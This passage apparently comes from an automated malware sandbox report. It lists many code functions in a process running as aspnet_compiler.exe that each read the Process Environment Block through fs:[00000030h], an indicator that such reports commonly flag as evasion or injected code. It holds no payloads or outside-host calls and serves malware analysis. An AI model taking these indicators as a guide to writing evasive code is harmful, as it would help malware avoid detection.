Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]	4_2_013D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0140C3CD mov eax, dword ptr fs:[00000030h]	4_2_0140C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]	4_2_01348397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]	4_2_01348397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]	4_2_01348397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]	4_2_0137438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]	4_2_0137438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]	4_2_0134E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]	4_2_0134E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]	4_2_0134E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0136E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0136E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0136E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013863FF mov eax, dword ptr fs:[00000030h]	4_2_013863FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]	4_2_013603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0135A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0135A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0135A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0135A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0135A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0135A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]	4_2_013583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]	4_2_013583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]	4_2_013583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]	4_2_013583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D63C0 mov eax, dword ptr fs:[00000030h]	4_2_013D63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134823B mov eax, dword ptr fs:[00000030h]	4_2_0134823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]	4_2_01400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]	4_2_01354260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]	4_2_01354260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]	4_2_01354260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134826B mov eax, dword ptr fs:[00000030h]	4_2_0134826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134A250 mov eax, dword ptr fs:[00000030h]	4_2_0134A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356259 mov eax, dword ptr fs:[00000030h]	4_2_01356259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D8243 mov eax, dword ptr fs:[00000030h]	4_2_013D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D8243 mov ecx, dword ptr fs:[00000030h]	4_2_013D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]	4_2_013602A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]	4_2_013602A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]	4_2_013E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E62A0 mov ecx, dword ptr fs:[00000030h]	4_2_013E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]	4_2_013E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]	4_2_013E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]	4_2_013E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]	4_2_013E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]	4_2_0138E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]	4_2_0138E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]	4_2_013D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]	4_2_013D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]	4_2_013D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]	4_2_013602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]	4_2_013602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]	4_2_013602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0135A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0135A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0135A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0135A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0135A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]	4_2_01360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]	4_2_0137E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]	4_2_0137E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]	4_2_0137E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]	4_2_0137E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]	4_2_0137E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E6500 mov eax, dword ptr fs:[00000030h]	4_2_013E6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]	4_2_01424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]	4_2_0138656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]	4_2_0138656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]	4_2_0138656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]	4_2_01358550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]	4_2_01358550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]	4_2_013745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]	4_2_013745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]	4_2_013D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]	4_2_013D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]	4_2_013D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E59C mov eax, dword ptr fs:[00000030h]	4_2_0138E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01384588 mov eax, dword ptr fs:[00000030h]	4_2_01384588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01352582 mov eax, dword ptr fs:[00000030h]	4_2_01352582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01352582 mov ecx, dword ptr fs:[00000030h]	4_2_01352582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0137E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013525E0 mov eax, dword ptr fs:[00000030h]	4_2_013525E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]	4_2_0138C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]	4_2_0138C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013565D0 mov eax, dword ptr fs:[00000030h]	4_2_013565D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0138A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0138A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]	4_2_0138E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]	4_2_0138E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138A430 mov eax, dword ptr fs:[00000030h]	4_2_0138A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134C427 mov eax, dword ptr fs:[00000030h]	4_2_0134C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]	4_2_0134E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]	4_2_0134E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]	4_2_0134E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]	4_2_013D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]	4_2_01388402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]	4_2_01388402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]	4_2_01388402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]	4_2_0137A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]	4_2_0137A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]	4_2_0137A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DC460 mov ecx, dword ptr fs:[00000030h]	4_2_013DC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134645D mov eax, dword ptr fs:[00000030h]	4_2_0134645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137245A mov eax, dword ptr fs:[00000030h]	4_2_0137245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]	4_2_0138E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013844B0 mov ecx, dword ptr fs:[00000030h]	4_2_013844B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013DA4B0 mov eax, dword ptr fs:[00000030h]	4_2_013DA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013564AB mov eax, dword ptr fs:[00000030h]	4_2_013564AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013504E5 mov ecx, dword ptr fs:[00000030h]	4_2_013504E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]	4_2_0138273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138273C mov ecx, dword ptr fs:[00000030h]	4_2_0138273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]	4_2_0138273C
